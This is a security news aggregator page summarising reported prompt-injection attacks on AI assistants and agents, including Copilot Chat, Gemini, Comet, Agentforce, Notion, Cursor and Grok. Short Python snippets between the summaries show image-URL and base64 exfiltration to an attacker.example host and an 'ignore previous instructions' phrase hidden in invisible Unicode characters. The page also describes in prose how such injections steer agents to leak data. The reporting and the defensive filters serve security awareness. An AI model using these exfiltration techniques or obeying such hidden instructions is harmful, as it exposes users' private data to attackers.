ciso brief

All news with the #prompt-injection-attack tag

106 articles · page 5 of 6

GitHub Copilot Chat prompt injection exposed secrets

🔐 GitHub Copilot Chat was tricked into leaking secrets from private repositories through hidden comments in pull requests, researchers found. Legit Security researcher Omer Mayraz reported a combined CSP bypass and remote prompt injection that used image rendering to exfiltrate AWS keys. GitHub mitigated the issue in August by disabling image rendering in Copilot Chat, but the case underscores risks when AI assistants access external tools and repository content.
read more →
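The exfiltration channel here is worth spelling out: if an assistant renders attacker-supplied markdown, an image URL can smuggle secrets out as a query string, with no user action beyond the render. A minimal sketch — the domain and key are hypothetical, not the actual payload from the report:

```python
# Sketch of image-rendering exfiltration: markdown that, when rendered,
# makes the client fetch an attacker URL carrying a secret in the query.
# "attacker.example" and the key value are illustrative placeholders.
secret = "AKIAEXAMPLEKEY"
md = f"![logo](https://attacker.example/pixel.png?k={secret})"

# Rendering this markdown triggers an HTTP request that delivers
# `secret` to the attacker's server.
print(secret in md)  # True
```

Disabling image rendering, as GitHub did, removes exactly this channel.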

Security firm urges disconnecting Gemini from Workspace

⚠️ FireTail warns that Google Gemini can be tricked by hidden ASCII control characters — a technique the firm calls ASCII Smuggling — allowing covert prompts to reach the model while remaining invisible in the UI. The researchers say the flaw is especially dangerous when Gemini is given automatic access to Gmail and Google Calendar, because hidden instructions can alter appointments or instruct the agent to harvest sensitive inbox data. FireTail recommends disabling automatic email and calendar processing, constraining LLM actions, and monitoring responses while integrations are reviewed.
read more →

Google won’t fix new ASCII smuggling attack in Gemini

⚠️ Google has declined to patch a new ASCII smuggling vulnerability in Gemini, a technique that embeds invisible Unicode Tags characters to hide instructions from users while still being processed by LLMs. Researcher Viktor Markopoulos of FireTail demonstrated hidden payloads delivered via Calendar invites, emails, and web content that can alter model behavior, spoof identities, or extract sensitive data. Google said the issue is primarily social engineering rather than a security bug.
read more →
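The mechanics of the technique described in both items above are simple: characters in the Unicode Tags block (U+E0000–U+E007F) mirror ASCII but render invisibly in most UIs, so hidden text rides along inside apparently benign strings. A minimal sketch of both the smuggling and a defensive filter — function names are ours, not FireTail's tooling:

```python
# Sketch: hiding text in invisible Unicode Tag characters, and a
# simple filter to strip them before text reaches an LLM.
TAG_BASE = 0xE0000  # Unicode Tags block offset

def smuggle(visible: str, hidden: str) -> str:
    """Append `hidden` encoded as invisible Tag characters."""
    tags = "".join(chr(TAG_BASE + ord(c)) for c in hidden)
    return visible + tags

def strip_tags(text: str) -> str:
    """Remove Tag-block characters (one possible mitigation)."""
    return "".join(c for c in text if not (0xE0000 <= ord(c) <= 0xE007F))

payload = smuggle("Meeting at 10am", "ignore previous instructions")
print(payload == "Meeting at 10am")   # False: hidden chars present
print(strip_tags(payload))            # Meeting at 10am
```

A filter like `strip_tags` applied at ingestion is the kind of control FireTail's recommendation to constrain LLM inputs points at.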

Gemini Trifecta: Prompt Injection Exposes New Attack Surface

🔒 Researchers at Tenable disclosed three distinct vulnerabilities in Gemini's Cloud Assist, Search personalization, and Browsing Tool. The flaws let attackers inject prompts via logs (for example by manipulating the HTTP User-Agent), poison search context through scripted history entries, and exfiltrate data by causing the Browser Tool to send sensitive content to an attacker-controlled server. Google has patched the issues, but Tenable and others warn this highlights the risks of granting agents too much autonomy without runtime guardrails.
read more →

CometJacking: One-Click Attack Turns AI Browser Rogue

🔐 CometJacking is a prompt-injection technique that can turn Perplexity's Comet AI browser into a data exfiltration tool with a single click. Researchers at LayerX showed how a crafted URL using the 'collection' parameter forces the agent to consult its memory, extract data from connected services such as Gmail and Calendar, obfuscate it with Base64, and forward it to an attacker-controlled endpoint. The exploit leverages the browser's existing authorized connectors and bypasses simple content protections.
read more →

CometJacking attack tricks Comet browser into leaking data

🛡️ LayerX researchers disclosed a prompt-injection technique called CometJacking that abuses Perplexity’s Comet AI browser by embedding malicious instructions in a URL's collection parameter. The payload directs the agent to consult connected services (such as Gmail and Google Calendar), encode the retrieved content in base64, and send it to an attacker-controlled endpoint. The exploit requires no credentials or additional user interaction beyond clicking a crafted link. Perplexity reviewed LayerX's late-August reports and classified the findings as "Not Applicable."
read more →
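The obfuscation step both CometJacking write-ups describe — base64-encoding harvested data before sending it out — is what lets the exfiltration slip past naive keyword filters. A small sketch under assumed names (the endpoint, parameter, and secret are placeholders, not LayerX's actual proof of concept):

```python
# Sketch of the base64 obfuscation step: encoded data defeats a
# plain-text filter, yet decodes losslessly at the attacker's end.
# "attacker.example" and the "d" parameter are hypothetical.
import base64
from urllib.parse import urlencode

secret = "alice@example.com: Q3 pipeline forecast"
blob = base64.b64encode(secret.encode()).decode()

# A content filter scanning for "@example.com" misses the encoded form:
print("@example.com" in blob)  # False

exfil_url = "https://attacker.example/c?" + urlencode({"d": blob})
print(base64.b64decode(blob).decode() == secret)  # True
```

This is why defenses need to inspect agent actions (where the data is going) rather than just scan outbound text for sensitive strings.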

Smashing Security 437: ForcedLeak in Salesforce AgentForce

🔐 Researchers uncovered a security flaw in Salesforce’s new AgentForce platform called ForcedLeak, which let attackers smuggle AI-readable instructions through a Web-to-Lead form and exfiltrate data for as little as five dollars. The hosts discuss the broader implications for AI integration, input validation, and the surprising ease of exploiting customer-facing forms. Episode 437 also critiques typical breach communications and covers ITV’s phone‑hacking drama and the Rosetta Stone story, with Graham Cluley joined by Paul Ducklin.
read more →

Notion 3.0 Agents Expose Prompt-Injection Risk to Data

⚠️ Notion 3.0 introduces AI agents that, the author argues, create a dangerous attack surface. The vulnerability exploits Simon Willison’s lethal trifecta—access to private data, exposure to untrusted content, and the ability to communicate externally—by hiding executable instructions in a white-on-white PDF that instructs the model to collect and exfiltrate client data via a constructed URL. The post warns that current agentic systems cannot reliably distinguish trusted commands from malicious inputs and urges caution before deployment.
read more →

Generative AI Infrastructure Faces Growing Cyber Risks

🛡️ A Gartner survey found 29% of security leaders reported generative AI applications in their organizations were targeted by cyberattacks over the past year, and 32% said prompt-structure vulnerabilities had been deliberately exploited. Chatbot assistants are singled out as particularly vulnerable to prompt-injection and hostile prompting. Additionally, 62% of companies experienced deepfake attacks, often combined with social engineering or automated techniques. Gartner recommends strengthening core controls and applying targeted measures for each new risk category rather than pursuing radical overhauls. The survey of 302 security leaders was conducted March–May 2025 across North America, EMEA and Asia‑Pacific.
read more →

Critical ForcedLeak Flaw Exposed in Salesforce AgentForce

⚠️ Researchers at Noma Security disclosed a critical 9.4-severity vulnerability called ForcedLeak that affected Salesforce's AI agent platform AgentForce. The chain used indirect prompt injection via Web-to-Lead form fields to hide malicious instructions within CRM data, enabling potential theft of contact records and pipeline details. Salesforce has patched the issue by enforcing Trusted URLs and reclaiming an expired domain used in the attack proof-of-concept. Organizations are advised to apply updates, audit lead data for suspicious entries, and strengthen real-time prompt-injection detection and tool-calling guardrails.
read more →

Salesforce Patches Critical 'ForcedLeak' Prompt Injection Bug

⚠️ Salesforce has released patches for a critical prompt-injection vulnerability dubbed ForcedLeak that could allow exfiltration of CRM data from Agentforce. Discovered and reported by Noma Security on July 28, 2025 and assigned a CVSS score of 9.4, the flaw affects instances using Web-to-Lead when input validation and URL controls are lax. Researchers demonstrated a five-step chain that coerces the Description field into executing hidden instructions, queries sensitive lead records, and transmits the results to an attacker-controlled, formerly allowlisted domain. Salesforce has re-secured the expired domain and implemented a Trusted URL allowlist to block untrusted outbound requests and mitigate similar prompt-injection vectors.
read more →

Critical Salesforce Flaw Could Leak CRM Data in Agentforce

🔒 A critical vulnerability in Salesforce Agentforce allowed malicious text placed in Web-to-Lead forms to act as an indirect prompt injection, tricking the AI agent into executing hidden instructions and potentially exfiltrating CRM data. Researchers at Noma Security showed attackers could embed multi-step payloads in a 42,000-character description field and even reuse an expired whitelisted domain as a data channel. Salesforce patched the issue on September 8, 2025, by enforcing Trusted URL allowlists, but experts warn that robust guardrails, input mediation, and ongoing agent inventorying are needed to mitigate similar AI-specific risks.
read more →
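The Trusted URL allowlist that Salesforce deployed across these ForcedLeak reports boils down to one check: before an agent fetches or posts to a URL, allow only exact hostname matches against a maintained list — which also blocks the expired-but-formerly-allowlisted domain trick. A minimal sketch with hypothetical hostnames:

```python
# Sketch of a Trusted URL check: only https URLs whose exact hostname
# is allowlisted may be contacted by the agent. Hostnames are
# illustrative, not Salesforce's actual configuration.
from urllib.parse import urlparse

TRUSTED_HOSTS = {"my-org.my.salesforce.com", "cdn.my-org.example"}

def is_trusted(url: str) -> bool:
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_HOSTS

print(is_trusted("https://my-org.my.salesforce.com/report"))   # True
print(is_trusted("https://expired-old-domain.example/exfil"))  # False
```

The exact-match set (rather than suffix matching) matters: suffix rules are what let lookalike or resurrected domains through.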

Two-Thirds of Businesses Hit by Deepfake Attacks in 2025

🛡️ A Gartner survey finds 62% of organisations experienced a deepfake attack in the past 12 months, with common techniques including social-engineering impersonation and attacks on biometric verification. The report also shows 32% of firms faced attacks on AI applications via prompt manipulation. Gartner’s Akif Khan urges integrating deepfake detection into collaboration tools and strengthening controls through awareness training, simulations and application-level authorisation with phishing-resistant MFA. Vendor solutions are emerging but remain early-stage, so operational effectiveness is not yet proven.
read more →

CrowdStrike to Acquire Pangea to Secure Enterprise AI

🔒 CrowdStrike announced its intent to acquire Pangea to deliver the industry’s first AI detection and response (AIDR) capability, securing enterprise AI use and development across data, models, agents, identities, infrastructure, and interactions. Unveiled at Fal.Con 2025 by Michael Sentonas, the deal will integrate Pangea’s prompt‑layer and interaction security with the Falcon platform to provide unified visibility, governance, and enforcement across the AI lifecycle. The combined solution targets prompt injection, model manipulation, shadow AI and sensitive data exfiltration while enabling developers and security teams to innovate faster with built‑in safeguards.
read more →

AI-Powered Browsers: Security and Privacy Risks in 2026

🔒 An AI-integrated browser embeds large multimodal models into standard web browsers, allowing agents to view pages and perform actions—opening links, filling forms, downloading files—directly on a user’s device. This enables faster, context-aware automation and access to subscription or blocked content, but raises substantial privacy and security risks, including data exfiltration, prompt-injection and malware delivery. Users should demand features like per-site AI controls, choice of local models, explicit confirmation for sensitive actions, and OS-level file restrictions, though no browser currently implements all these protections.
read more →

Prompt Injection via Macros Emerges as New AI Threat

🛡️ Enterprises now face attackers embedding malicious prompts in document macros and hidden metadata to manipulate generative AI systems that parse files. Researchers and vendors have identified exploits — including EchoLeak and CurXecute — and a June 2025 Skynet proof-of-concept that target AI-powered parsers and malware scanners. Experts urge layered defenses such as deep file inspection, content disarm and reconstruction (CDR), sandboxing, input sanitization, and strict model guardrails to prevent AI-driven misclassification or data exposure.
read more →

Cursor autorun flaw lets repos execute arbitrary code

🔓 Oasis Security disclosed a flaw in Cursor that allows malicious repositories to execute code when a developer opens a folder. The vulnerability stems from Workspace Trust being disabled by default, permitting crafted .vscode/tasks.json entries set to run on folder open to autorun without prompting. Successful exploitation can expose API keys, cloud credentials and local secrets, risking organization-wide compromise.
read more →
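The mechanism Oasis Security describes — a task in `.vscode/tasks.json` configured to run on folder open, executing without a Workspace Trust prompt — is easy to scan for before opening an unfamiliar repository. A heuristic sketch (real tasks.json files may contain JSONC comments, which strict JSON parsing rejects; this sketch treats unparseable configs as suspicious):

```python
# Sketch: flag repos whose .vscode/tasks.json requests automatic
# execution on folder open ("runOn": "folderOpen"), the mechanism
# abused in the Cursor autorun flaw. Heuristic only.
import json
from pathlib import Path

def has_autorun_task(repo: Path) -> bool:
    tasks_file = repo / ".vscode" / "tasks.json"
    if not tasks_file.is_file():
        return False
    try:
        data = json.loads(tasks_file.read_text())
    except (json.JSONDecodeError, OSError):
        return True  # unparseable config: treat as suspicious
    return any(
        task.get("runOptions", {}).get("runOn") == "folderOpen"
        for task in data.get("tasks", [])
    )
```

Re-enabling Workspace Trust remains the real fix; a scan like this only helps triage repositories before they are opened at all.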

New Malware Campaigns: MostereRAT and ClickFix Risks

🔒 Researchers disclosed linked phishing campaigns delivering a banking malware-turned-RAT called MostereRAT and a ClickFix-style chain distributing MetaStealer. Attackers use an obscure Easy Programming Language (EPL), mutual TLS for C2, and techniques to disable Windows security and run as TrustedInstaller to evade detection. One campaign drops remote-access tools like AnyDesk and VNC variants; another uses fake Cloudflare Turnstile pages, LNK tricks, and a prompt overdose method to manipulate AI summarizers.
read more →

Smashing Security #433: Hackers Harnessing AI Tools

🤖 In episode 433 of Smashing Security, Graham Cluley and Mark Stockley examine how attackers are weaponizing AI, from embedding malicious instructions in legalese to using generative agents to automate intrusions and extortion. They discuss LegalPwn prompt-injection tactics that hide payloads in comments and disclaimers, and new findings from Anthropic showing AI-assisted credential theft and custom ransomware notes. The episode also includes lighter segments on keyboard history and an ingenious AI-generated CAPTCHA.
read more →

Threat Actors Use X's Grok AI to Spread Malicious Links

🛡️ Guardio Labs researcher Nati Tal reported that threat actors are abusing Grok, X's built-in AI assistant, to surface malicious links hidden inside video ad metadata. Attackers omit destination URLs from visible posts and instead embed them in the small "From:" field under video cards, which X apparently does not scan. By prompting Grok with queries like "where is this video from?", actors get the assistant to repost the hidden link as a clickable reference, effectively legitimizing and amplifying scams, malware distribution, and deceptive CAPTCHA schemes across the platform.
read more →